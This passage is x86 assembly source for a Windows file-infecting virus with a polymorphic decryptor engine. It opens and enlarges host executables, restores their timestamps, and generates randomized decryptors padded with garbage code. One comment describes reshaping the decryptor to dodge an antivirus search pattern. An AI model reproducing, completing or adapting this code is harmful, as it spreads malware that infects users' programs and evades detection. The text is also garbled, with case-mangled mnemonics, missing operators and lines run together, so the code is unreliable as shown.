MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]
CMP EAX, ECX
JB ERR_API_CALL; BELOW IMPORTS?
Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]
CMP EAX, ECX
JAE ERR_API_CALL; Above Imports?
Found_Place:; use this point? or better Continue the Search?
Call get_rnd_range
Test Eax, 01H
JZ ERR_API_CALL
POP EAX
MOV ECX, ESI
Dec ECX
SUB ECX, EBX
RET
TRY_MICROSOFT: CMP BYTE PTR [ESI], 15h
JNE ERR_API_CALL
Mov Eax, DWORD PTR [ESI 00000001H]
SUB EAX, DWORD PTR [EBP HOST_BASE]
MOV EDX, DWORD PTR [EBP Importsh]
MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]
CMP EAX, ECX
JB ERR_API_CALL; BELOW IMPORTS?
Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]
CMP EAX, ECX
JAE ERR_API_CALL; Above Imports?
SUB EAX, DWORD PTR [EDX SH_VIRTUALADDRESS]
Add Eax, DWORD PTR [EDX Sh_POINTERTORAWDATA]
Push DWORD PTR [EAX EBX]
POP EAX
; If File Is Binded Eax Contains The Address of The API
Leets CHECK IF EAX POINTS TO A KERNEL32 API
CMP EAX, DWORD PTR [EBP K32CODESTART]
JB INSIDE_IMPORT
CMP EAX, DWORD PTR [EBP K32CODEEND]
JB Found_Place
INSIDE_IMPORT: MOV EDX, DWORD PTR [EBP IMPORTSH]
MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]
CMP EAX, ECX
JB ERR_API_CALL; BELOW IMPORTS?
Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]
CMP EAX, ECX
JAE ERR_API_CALL; Above Imports?
JMP Found_Place
; ================================================== ===========================; seh handling routines code by jacky qWERTY / 29A
; ================================================== ===========================
SEH_FRAME: SUB EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
JMP [ESP. (02H * pshd) .retaddr]
SEH_REMOVEFRAME: Push 00000000H
POP EDX
Pop DWORD PTR [ESP. (02H * pshd) .retaddr]
POP DWORD PTR FS: [EDX]
POP EDX
RET (PSHD)
SEH_SETUPFRAME: CALL SEH_FRAME
Mov Eax, [ESP.EH_EXCEPTIONRECORD]
TEST BYTE PTR [EAX.ER_EXCEPTIONFLAGS], /
EH_UNWINDING OR EH_EXIT_UNWIND
MOV EAX, DWORD PTR [EAX.ER_EXCEPTIONCODE]
Jnz SEH_SEARCH
Add eax, -exception_access_violation
Jnz SEH_SEARCH
MOV ESP, DWORD PTR [ESP.EH_ESTABLISHERFRAME]
MOV DWORD PTR FS: [EAX], ESP
JMP DWORD PTR [ESP. (02H * pshd) .arg1]
SEH_SEARCH: XOR EAX, EAX
RET
; ================================================== ===========================; Filemapro Open and map a file for read-only access
;
On Entry:
BUFSTRFILENAME -> Buffer Filled with Path FileName
EXIT:
EAX -> Base Address of Memory Map for File or Null IF Error
; ================================================== ===========================
; ================================================== ===========
GetfileAttributes
; ================================================== ===========
Filemapro: LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]
Push ESI; LPFILENAME
Call DWORD PTR [EBP A_GETFILEATTRIBUTESA]
CMP EAX, 0FFFFFFFH
JNE FileGetattrokfilegettractrer: xor Eax, EAX
RET
; ================================================== ===========
Createfile (generic_read)
; ================================================== ===========
Filegettrok: MOV DWORD PTR [EBP CURFileAtTR], EAX
XOR EDI, EDI
Push EDI; HTEMPLATEFILE
Push file_attribute_normal; dwflagsandattributes
Push Open_EXISTING; DWCREATIONDisPosition
Push EDI; LPSecurityAttributes
Push EDI; DWSHAREMODE
Push generic_read; dwdesiredAccess
Push ESI; LPFILENAME
Call DWORD PTR [EBP A_CREATEFILEA]
CMP EAX, INVALID_HANDLE_VALUE
Je Filegettrerrrrrrrrrrrr
; ================================================== ===========
CREATEFILEMAPPING (Page_Readonly)
; ================================================== ===========
MOV DWORD PTR [EBP H_CREATEFILE], EAXPUSH EDI; LPNAME
Push EDI; DWMAXIMUMSIZELOW
Push EDI; DWMAXIMUMSIZEHIGH
Push Page_readonly; flprotect
Push EDI; LPFILEMAPPINGATTRIBUTES
Push DWORD PTR [EBP H_CREATEFILE]; HFILE
Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]
OR EAX, EAX
Jnz Okfilemappingro
Errfilemapro: Push DWORD PTR [EBP H_CREATEFILE]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP Filegettrerr
; ================================================== ===========
MappViewoffile
; ================================================== ===========
Okfilemappingro: MOV DWORD PTR [EBP H_FILEMAP], EAX
Push EDI; DWNUMBEROFBYTOMAP
Push EDI; DWFILEOFFSETLOW
Push EDI; DWFILEOFFSETHIGH
Push file_map_read; dwdesiredAccess
Push Eax; HfileMappingObject
Call DWORD PTR [EBP A_MAPVIEWOFFILE]
OR EAX, EAX
Jnz FileViewokro
FileViewError: Push DWORD PTR [EBP H_FILEMAP]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP Errfilemapro
; ================================================== ===========
Ready!; ============================================== ==============
FileViewokro: MOV DWORD PTR [EBP MAP_IS_HERE], EAX
RET
; ================================================== ===========
Unmapro
; ================================================== ===========
Fileunmapro: Push EBX
Call DWORD PTR [EBP A_UNMAPVIEWOFFILE]
JMP FileViewErrorro
; ================================================== ===========================
Filemaprw Open and Map A File for Read and Write Access
;
On Entry:
BUFSTRFILENAME -> Buffer Filled with Path FileName
EXIT:
EAX -> Base Address of Memory Map for File or Null IF Error
; ================================================== ===========================; ===================================================================================================================================================== =======================================
Calculate size of infread file
; ================================================== ===========
Filemaprw: MOV Eax, DWORD PTR [EBP VIR_OFFSET]
Add Eax, (SIZE_VIRTUAL * 02H) /
(Number_of_Poly_Layers * 00004000H)
MOV ECX, SIZE_PADDING
XOR EDX, EDX
Div ECX
INC EAX
Mul ECX
Mov DWORD PTR [EBP FATSIZE], EAX
; ================================================== ===========
SetFileAttributes
; ================================================== =========== LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]
Push file_attribute_normal; dwfileAttributes
Push ESI; LPFILENAME
Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]
OR EAX, EAX
JNZ FileSetattrok
FileSetattrer: xor Eax, EAX
RET
; ================================================== ===========
Createfile (generic_read or generic_write)
; ================================================== ===========
FileSetattrok: xor Edi, EDI
MOV DWORD PTR [EBP MAP_IS_HERE], EDI
Push EDI; HTEMPLATEFILE
Push file_attribute_normal; dwflagsandattributes
Push Open_EXISTING; DWCREATIONDisPosition
Push EDI; LPSecurityAttributes
Push EDI; DWSHAREMODE
Push generic_read or generic_write; dwdesiredAccess
Push ESI; LPFILENAME
Call DWORD PTR [EBP A_CREATEFILEA]
CMP EAX, INVALID_HANDLE_VALUE
JNE FileOpenokrw
FileopenerrorRrw: Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]; Need for Reverse!
Push DWORD PTR [EBP CURFileAttr]; DWFileAttributes
Push ESI; LPFILENAME
Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]
JMP FileSetattrerr
; ================================================== ===========
CREATEFILEMAPPING (Page_Readwrite)
; ================================================== ===========
FileOpenokrw: MOV DWORD PTR [EBP H_CREATEFILE], EAX
Push EDI; LPNAME
Push DWORD PTR [EBP FATSIZE]; DWMAXIMUMSIZELOW
Push EDI; DWMAXIMUMSIZEHIGH
Push Page_Readwrite; flprotect
Push EDI; LPFILEMAPPINGATTRIBUTES
Push eax; hfile
Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]
OR EAX, EAX
JNZ Filemapokrw
FilemaperrorRrw: CMP DWORD PTR [EBP MAP_IS_HERE], EDI
JZ FileSizeisok
MOV ESI, DWORD PTR [EBP H_CREATEFILE]
XOR EAX, EAX
Push Eax; DWMoveMethod
Push Eax; LPDistanceTomovehigh
Push DWORD PTR [EBP FATSIZE]; LDISTANCETOMOVE
Push ESI; HFILE
Call DWORD PTR [EBP A_SETFILEPOINTER]
CMP EAX, 0FFFFFFFH
Je FileSizeisok
Push ESI; HFILE
Call DWORD PTR [EBP A_SETENDOFFILE]
Lea Edx, DWORD PTR [EBP FT_LASTWRITIME]
Push Edx
Sub EDX, 00000008H
Push Edx
Sub EDX, 00000008H
Push Edx
PUSH ESI
Call DWORD PTR [EBP A_SETFILETIME]
FileSizeisok: Push DWORD PTR [EBP H_CREATEFILE]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP FileOpenerrorRrw
; ================================================== ===========; MapViewOffile
; ================================================== ===========
Filemapokrw: MOV DWORD PTR [EBP H_FILEMAP], EAX
Push DWORD PTR [EBP FATSIZE]; DWNUMBEROFBYTOMAP
Push EDI; DWFILEOFFSETLOW
Push EDI; DWFILEOFFSETHIGH
Push file_map_write; dwdesiredAccess
Push Eax; HfileMappingObject
Call DWORD PTR [EBP A_MAPVIEWOFFILE]
OR EAX, EAX
JNZ FileViewokrw
FileViewErrorRrw: Push DWORD PTR [EBP H_FILEMAP]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP FilemaPerrorRW
FileViewokrw: MOV DWORD PTR [EBP MAP_IS_HERE], EAX
RET
; ================================================== ===========
Unmaprw
; ================================================== ===========
Fileunmaprw: Push EBX
Call DWORD PTR [EBP A_UNMAPVIEWOFFILE] JMP FileViewErrorrw
; ================================================== ===========================
Convert RVA TO RAW
;
On Entry:
EBX -> Host Base Address
; EDX -> RVA TO Convert
ON EXIT:
; ECX -> Pointer to Raw Data or Null IF Error
; EDX -> Section Delta Offset
ESI -> Pointer to Image_Optional_Header
EDI -> Pointer to Section Header
; ================================================== ===========================
RVA2RAW: CLD
MOV DWORD PTR [EBP Search_RAW], EDX
MOV ESI, DWORD PTR [EBX MZ_LFANEW]
Add ESI, EBX
Lodsd
Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]
JECXZ ERR_RVA2RAW
Movzx EDI, Word PTR [ESI FH_SIZEOFOPTIONALHEADER]
Add ESI, Image_SizeOf_file_header
Add Edi, ESI
; ================================================== ===========
Get the image_section_header That Contains RVA
;
; At this point :;
EBX -> File Base Address
ESI -> Pointer to Image_Optional_Header
EDI -> Pointer to First Section Header
ECX -> Number of Sections
;
Check if address of imports directory is inside THIS DIRECTORY IS INSIDE
; section
; ================================================== ===========
S_IMG_SECTION: MOV EAX, DWORD PTR [EBP Search_RAW]
MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]
Sub Eax, EDX
CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]
JB Section_ok
; ================================================== ===========
Go to Next Section Header
; ================================================== ===========
OUT_OF_SECTION: Add Edi, Image_SizeOf_SECTION_HEADER
Loop S_IMG_SECTION
ERR_RVA2RAW: RET
; ================================================== ===========
Get Raw
; ================================================== ===========
Section_ok: MOV ECX, DWORD PTR [EDI SH_POINTERTORAWDATA]
Sub EDX, ECX
Add ECX, EAX
Add ECX, EBX
RET
; ================================================== ===========================
Get code section header and entry-point information
;
On Entry:
EBX -> Host Base Address
ON EXIT:
; ECX -> Pointer to Raw Data or Null IF Error
EDX -> Entry-Point RVA
ESI -> Pointer to Image_Optional_Header
EDI -> Pointer to Section Header
; ================================================== ===========================
GET_CODE_SH: CALL GET_LAST_SH
MOV EDX, DWORD PTR [ESI OH_ADDRESSOFENTRYPOINT]
Push Edx
Call Rva2Raw
POP EDX
RET
; ================================================== ============================ g Pointer to Last Section Header
;
On Entry:
EBX -> Host Base Address
ON EXIT:
ESI -> Image_Optional_Header
EDI -> Pointer to Last Section Header
; ================================================== ===========================
GET_LAST_SH: PUSH ECX
MOV ESI, DWORD PTR [EBX MZ_LFANEW]
Add ESI, EBX
CLD
Lodsd
Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]
Dec ECX
MOV EAX, Image_SizeOf_section_Header
Mul ECX
Movzx EDX, Word Ptr [ESI FH_SIZEOFOPTIONALHEADER]
Add ESI, Image_SizeOf_file_header
Add Eax, EDX
Add Eax, ESI
Mov Edi, EAX
POP ECX
RET
; ================================================== ===========================
Generate Data Area Suitable for Memory Write Access
;
EDI -> Base Address
ECX -> size; ============================================ =======================================================================================================================================================
Gen_data_area: Push Eax
Push Edx
Movzx Eax, Byte PTR [EBP NumberofDataareas]]
CMP EAX, NUM_DA
JAE NO_MORE_DA
Lea EDX, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]
Mov Eax, EDI
SUB EAX, DWORD PTR [EBP MAP_IS_HERE]
Add Eax, DWORD PTR [EBP HOST_BASE]
Push ECX
MOV ECX, DWORD PTR [EBP VIRUS_SH]
Sub Eax, DWORD PTR [ECX SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [ECX SH_VIRTUALADDRESS]
Mov DWORD PTR [EDX], EAX
POP ECX
MOV DWORD PTR [EDX 00000004h], ECX
Inc Byte PTR [EBP NumberofDataareas]]
NO_MORE_DA: POP EDX
POP EAX
RET
; ================================================== ===========================
Generate a Block of Random Data
; ================================================== =========================== gEN_RND_BLOCK: MOV EAX, 0000000AH
MOV ECX, EAX
Call get_rnd_range
Add ECX, EAX
Call Gen_Data_Area
RND_FILL: MOV EAX, DWORD PTR [EBP FileSizeOnDisk]
Dec EAX
Sub Eax, ECX
Call get_rnd_range
Add Eax, DWORD PTR [EBP MAP_IS_HERE]
Mov ESI, EAX
CLD
REP MOVSB
RET
; ================================================== ===========================
LINEAR CONGRUENT PSEUDORAndom Number Generator
; ================================================== ===========================
GET_RND32: PUSH ECX
Push Edx
MOV EAX, DWORD PTR [EBP RND32_SEED]
MOV ECX, 41C64E6DH
Mul ECX
Add eax, 00003039H
And Eax, 7FFFFFFH
MOV DWORD PTR [EBP RND32_SEED], EAX
POP EDX
POP ECX
RET
; ================================================== ===========================; returns a Random Num Between 0 and Entry EAX
; ================================================== ===========================
GET_RND_RANGE: PUSH ECX
Push Edx
MOV ECX, EAX
Call get_rnd32
XOR EDX, EDX
Div ECX
MOV EAX, EDX
POP EDX
POP ECX
RET
; ================================================== ===========================
; Perform Encryption
; ================================================== ===========================
; ================================================== ============; this buffer will contact the code to "crypt" the Virus Code
FOLLOWED by a return instruction
; ================================================== ===========
Perform_crypt: DB 10h DUP (90h)
; ================================================== ===========================
Generate Decryptor Action: loading Pointer
;
WE DONT NEED TO GET DELTA-OFFSET, this Virus AssuMes Fixed Load Address
; ================================================== ===========================
Gen_load_ptr: MOV Al, 0B8H
OR Al, Byte PTR [EBP INDEX_MASK]
Stosb
MOV EAX, DWORD PTR [EBP HOST_BASE]
Add Eax, DWORD PTR [EBP PTRTOCRYPT] Add Eax, DWORD PTR [EBP PTR_DISP]
MOV EDX, DWORD PTR [EBP VIRUS_SH]
Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]
TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION
JZ FIX_DIR_OK
Push Eax; FIX UPON DIRECTION
Call fixed_size2ecx
XOR EAX, EAX
MOV Al, Byte PTR [EBP OPER_SIZE]
Push EAX
Mul ECX
POP ECX
Sub Eax, ECX
POP ECX
Add Eax, ECX
FIX_DIR_OK: StOSD
RET
; ================================================== ===========================
; Generate Decryptor Action: loading counter
; ================================================== ===========================
; ================================================== ===========
Easy Now, Just Move Counter Random Initial Value
; INTO Counter REG AND CALCULATE The End Value
; ================================================== =========== GEN_LOAD_CTR: MOV Al, 0B8H
OR Al, Byte PTR [EBP Counter_mask]
Stosb
Call fixed_size2ecx
Call get_rnd32
Stosd
TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR
JNZ Counter_Down
Counter_up: Add Eax, ECX
JMP Short Done_ctr_dir
Counter_Down: Sub Eax, ECX
DONE_CTR_DIR: MOV DWORD PTR [EBP END_VALUE], EAX
RET
; ================================================== ===========================
; Generate Decryptor Action: Decrypt
; ================================================== ===========================
Gen_Decrypt: MOV Eax, DWORD PTR [EBP PTR_DISP]
MOV DWORD PTR [EBP FAKE_PTR_DISP], EAX
MOV EAX, DWORD PTR [EBP CRYPT_KEY]
MOV DWORD PTR [EBP FAKE_CRYPT_KEY], EAX
MOV Al, Byte PTR [EBP Build_Flags]
MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al
MOV Al, Byte PTR [EBP OPER_SIZE]
MOV BYTE PTR [EBP FAKE_OPER_SIZE], Almov Al, Byte PTR [EBP INDEX_MASK]
MOV BYTE PTR [EBP FAKE_INDEX_MASK], Al
Call fake_or_not
XOR EAX, EAX
MOV Al, Byte PTR [EBP OPER_SIZE]
SHR EAX, 01H
SHL EAX, 02H
Add ESI, ESI
Lodsd
Add Eax, EBP
Mov ESI, EAX
Push EDI
Lea EDI, DWORD PTR [EBP Perform_Crypt]
LOOP_STRING: LODSB
CMP Al, Magic_ENDSTR
JE END_OF_MAGIC
CMP Al, Magic_ENDKEY
JE Last_SPell
XOR ECX, ECX
MOV CL, Al
REP MOVSB
JMP Short loop_string
Last_spell: Call Copy_Key
END_OF_MAGIC: MOV Al, 0C3H
Stosb
POP EDI
RET
; ================================================== ===========================
Copy Encryption Key Into Work Buffer Taking Care About Operand Size
; ================================================== ===========================
Copy_Key: MOV Eax, DWORD PTR [EBP FAKE_CRYPT_KEY]
Movzx ECX, Byte Ptr [EBP FAKE_OPER_SIZE]
LOOP_KEY: Stosb
SHR EAX, 08H
Loop loop_key
RET
; ================================================== ===========================; Generate Decryptor Action: Move Index to Next Step
; ================================================== ===========================
; ================================================== ===========
Get Number of Bytes to incor Dec the index REG
; ================================================== ===========
GEN_NEXT_STEP: MOVZX ECX, Byte Ptr [EBP OPER_SIZE]
; ================================================== ===========; Get Number of Bytes to Update with this Instruction
; ================================================== ===========
LOOP_UPDATE: MOV EAX, ECX
Call get_rnd_range
INC EAX
; ================================================== ===========
Check Direction
; ================================================== ===========
TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION
JNZ Step_Down
Call do_step_up
JMP Short Next_UPDATE
Step_down: Call do_step_down
Next_UPDATE: SUB ECX, EAX
Call Gengarbageex
JECXZ END_UPDATE
JMP Short loop_update
END_UPDATE: RET
; ================================================== ===========; Move Index_REG UP
; ================================================== ===========
Do_step_up: push eax
Mov Eax, NumidXup
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBL_IDX_UP EAX * 04H]
Lodsd
Add Eax, EBP
JMP EAX
IDXUPWITHADD: MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
Stosd
RET
IDXUPWITHSUB: MOV AX, 0E881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
NEG EAX
Stosd
NEG EAX
RET
IDXUPWITHINC: MOV Al, 40h
OR Al, Byte PTR [EBP INDEX_MASK]
Stosb
POP EAX
MOV EAX, 000000001H
RET
IDXUPADDADD: CALL SAVE_IT_ADD
Push EAX
MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Sub Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
IDXUPADDSUB: CALL SAVE_IT_ADD
Push EAX
Mov AX, 0e881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Sub Eax, EDX
Stosd
MOV EAX, EDX
RET
IDXUPSUBSUB: CALL SAVE_IT_SUB
Push EAX
Mov AX, 0e881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Add Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
IDXUPSUBADD: CALL SAVE_IT_SUB
Push EAX
MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Add Eax, EDX
Stosd
MOV EAX, EDX
RET
; ================================================== ===========; Move Index_Reg Down
; ================================================== ===========
Do_step_down: push eax
Mov Eax, NumIDXDown
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBL_IDX_DOWN EAX * 04H]
Lodsd
Add Eax, EBP
JMP EAX
IDXDownwithadd: MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
NEG EAX
Stosd
NEG EAX
RET
IDXDownwithsub: MOV AX, 0E881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
Stosd
RET
IDXDownwithDec: Mov Al, 48h
OR Al, Byte PTR [EBP INDEX_MASK]
Stosb
POP EAX
MOV EAX, 00000001H
RET
IDXDOWNADDADD: CALL SAVE_IT_ADD
Push EAX
MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Sub Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
IDXDOWNADDSUB: CALL SAVE_IT_ADD
Push EAX
Mov AX, 0e881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Sub Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
IDXDOWNSUBSUB: CALL SAVE_IT_SUB
Push EAX
Mov AX, 0e881H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Add Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
IDXDOWNSUBADD: CALL SAVE_IT_SUB
Push EAX
MOV AX, 0C081H
OR AH, BYTE PTR [EBP INDEX_MASK]
Stosw
POP EAX
POP EDX
Add Eax, EDX
NEG EAX
Stosd
MOV EAX, EDX
RET
SAVE_IT_ADD: CALL TOTAL_SAVE_IT
Push Edx
MOV Al, 03H
Stosw
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
Call Gengarbageex
POP EAX
RET
Save_it_sub: Call Total_save_it
Push Edx
MOV Al, 2BH
Stosw
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
Call Gengarbageex
POP EAX
RET
Total_save_it: Call get_valid_reg
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
MOV Al, 0B8H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call get_rnd32
Stosd
Push EAX
Push EBX
Call Gengarbageex
POP EBX
MOV AH, BYTE PTR [EBP INDEX_MASK]
SHL AH, 03H
OR AH, BYTE PTR [EBX REG_MASK]
OR AH, 0C0H
POP EDX
RET
; ================================================== ===========================
Generate Decryptor Action: Next Counter Value
; ================================================== ===========================
; ================================================== ===========
Check counter direction and update counter; using a incor Dec Instruction
; ================================================== ===========
GEN_NEXT_CTR: TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR
JNZ UPD_CTR_DOWN
UPD_CTR_UP: CALL GET_RND32
And Al, 01H
JZ Countupinc
MOV Al, 40h
JMP doshitwithctr
Countupinc: MOV Al, 40h
OR Al, Byte PTR [EBP Counter_mask]
JMP short Upd_ctr_ok
UPD_CTR_DOWN: CALL GET_RND32
And Al, 01H
JZ CountuPDEC
MOV Al, 48h
JMP doshitwithctr
CountuPDEC: MOV Al, 48h
OR Al, Byte PTR [EBP Counter_mask]
UPD_CTR_OK: Stosb
RET
Doshitwithctr: Push EAX
Call Get_Valid_reg
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
MOV AH, BYTE PTR [EBX REG_MASK]
SHL AH, 03H
OR AH, BYTE PTR [EBP Counter_Mask]
OR AH, 0C0H
MOV Al, 8BH
Stosw
Push EBX
Call Gengarbageex
POP EBX
POP EAX
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Push EBX
Call Gengarbageex
POP EBX
MOV AH, BYTE PTR [EBP Counter_Mask]
SHL AH, 03H
OR AH, BYTE PTR [EBX REG_MASK]
OR AH, 0C0H
MOV Al, 8BH
Stosw
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
RET
; ================================================== ===========================
Generate Decryptor Action: loop
; ================================================== ===========================; ===================================================================================================================================================== =======================================
Use Counter REG IN CMP INSTRUCTION?
; ================================================== ===========
Gen_Loop: Test Byte Ptr [EBP Build_Flags], Crypt_cmpctr
Jnz Doloopauxreg
; ================================================== ===========
Generate Cmp Counter_reg, End_Value
; ================================================== ===========
MOV AX, 0F881hor AH, BYTE PTR [EBP Counter_Mask]
Stosw
MOV EAX, DWORD PTR [EBP END_VALUE]
Stosd
JMP DOLOOPREADY
; ================================================== ===========
; Get a Random Valid Register To Use in A CMP Instruction
; ================================================== ===========
DOLOOPAUXREG: CALL GET_VALID_REG
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
; ================================================== ===========
Move Index Reg Value INTO AUX REG
; ================================================== ===========
MOV AH, BYTE PTR [EBX REG_MASK]
SHL AH, 03H
OR AH, BYTE PTR [EBP Counter_Mask]
OR AH, 0C0H
MOV Al, 8BH
Stosw
; ================================================== ===========; guess what !?
; ================================================== ===========
Push EBX
Call Gengarbageex
POP EBX
Call get_rnd32
And Al, 03H
OR Al, Al
JZ loop_use_cmp
Test Al, 02h
JZ loop_use_sub
; ================================================== ===========
Generate Add Aux_reg, -end_value
; ================================================== ===========
LOOP_USE_ADD: MOV AX, 0C081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
MOV EAX, DWORD PTR [EBP END_VALUE]
NEG EAX
Stosd
JMP Short Done_loop_use
; ================================================== ===========; Generate Cmp Aux_reg, End_Value
; ================================================== ===========
LOOP_USE_CMP: MOV AX, 0F881H
JMP Short loop_mask_here
; ================================================== ===========
Generate Sub Aux_reg, End_Value
; ================================================== ===========
LOOP_USE_SUB: MOV EAX, 0e881H
LOOP_MASK_HERE: OR AH, BYTE PTR [EBX REG_MASK]
Stosw
MOV EAX, DWORD PTR [EBP END_VALUE]
Stosd
; ================================================== ===========; Restore Aux Reg State
; ================================================== ===========
DONE_LOOP_USE: XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
; ================================================== ===========
Genere Conditional Jump
; ================================================== ===========
DoloopReady: Mov Eax, NumexitLoop
Call get_rnd_range
Lea ESI, DWORD PTR [EBP TBLEXITLOOP EAX * 04H]
Lodsd
Add Eax, EBP
JMP EAX
TbleXitLoop EQU $
DD Offset DOLOOPUP
DD Offset Doloopdown
DD Offset Doloopmix
NumexitLoop EQU ($ -TblexitLoop) / 04H
; ================================================== ===========; Generate The FOLLOWING STRUCTURE:
;
Loop_point:
; ...
JNZ loop_point
; ...
JMP Decrypted-Code
; ================================================== ===========
DOLOOPUP: MOV DWORD PTR [EBP CONDition_PTR], EDI
MOV AX, 850FH
Stosw
MOV EAX, DWORD PTR [EBP LOOP_POINT]
Sub Eax, EDI
Sub Eax, 00000004H
Stosd
Call Gengarbageex
MOV ESI, DWORD PTR [EBP PTRTOEP]
Call docomplexcmp
JMP Createfog
; ================================================== ===========
; ... or this one:
;
Loop_point:
; ...
JZ Decrypted-Code
; ...
; jmp loop_point
; ...
; ================================================== ===========
DOLOOPDOWN: MOV DWORD PTR [EBP CONDition_PTR], EDI
MOV AX, 840FH
Stosw
MOV EAX, DWORD PTR [EBP PTRTOEP] SUB EAX, EDI
Sub Eax, 00000004H
Stosd
Call Gengarbageex
MOV ESI, DWORD PTR [EBP LOOP_POINT]
Call docomplexcmp
JMP Createfog
; ================================================== ===========
Generate The Following Structure:
;
Loop_point:
; ...
JNZ auxdest
; ...
JMP Decrypted-Code
; ...
; AUXDEST:
; ...
; jmp loop_point
; ================================================== ===========
DOLOOPMIX: MOV DWORD PTR [EBP CONDition_PTR], EDI
MOV AX, 850FH
Stosw
Push EDI
Stosd
Call Gengarbageex
MOV ESI, DWORD PTR [EBP PTRTOEP]
Call docomplexcmp
Call Gengarbageex
POP EDX
Mov Eax, EDI
Sub Eax, 00000004H
Sub Eax, EDX
Mov DWORD PTR [EDX], EAX
Call Gengarbageex
MOV ESI, DWORD PTR [EBP LOOP_POINT]
Call docomplexcmp
; ================================================== ===========
I Notice Some av WAS Using the JZ / JNZ Instruction At the JZ / JNZ INSTRUCTION
; End of the decryptor in a search pattern ... so now im Going
To build it at runtime (sometimes ...)
; ================================================== =========== Createfog: test byte ptr [EBP Build_Flags], Crypt_fog
JZ Nofogret
Mov Eax, Numfog
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBLDOFOG EAX * 04H]
Lodsd
Add Eax, EBP
Call EAX
MOV EAX, Numfixfog
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBLFIXFOG EAX * 04H]
Lodsd
MOV ESI, DWORD PTR [EBP CONDition_ptr]
Add Eax, EBP
Call EAX
Nofogret: Ret
; ================================================== ===========================
Prepare Pointer to Memory Into Fog Block, Using Add
; ================================================== ===========================
DofogAdd: Call Fogstart
SUB EAX, DWORD PTR [EBP XRND1]
Push EDI
Push EAX
MOV EBX, DWORD PTR [EBP XRNDREG]
MOV EDI, DWORD PTR [EBP XRNDFIXPTR]
MOV AX, 0C081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
POP EAX
Stosd
POP EDI
RET
FixfogAdd: Push Edi
MOV EDI, DWORD PTR [EBP XRNDMATH]
MOV Al, 81H
MOV AH, BYTE PTR [EBX REG_MASK]
Stosw
Call get_rnd32
Stosd
Sub DWORD PTR [ESI], EAX
POP EDI
RET
; ================================================== ===========================
Prepare Pointer To Memory Into Fog Block, Using Sub
; ================================================== ===========================
DOFOGSUB: Call FogStart
NEG EAX
Add Eax, DWORD PTR [EBP XRND1]
Push EDI
Push EAX
MOV EBX, DWORD PTR [EBP XRNDREG]
MOV EDI, DWORD PTR [EBP XRNDFIXPTR]
Mov AX, 0e881H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
POP EAX
Stosd
POP EDI
RET
FIXFOGSUB: PUSH EDI
MOV EDI, DWORD PTR [EBP XRNDMATH]
MOV AX, 2881H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call get_rnd32
Stosd
Add DWORD PTR [ESI], EAX
POP EDI
RET
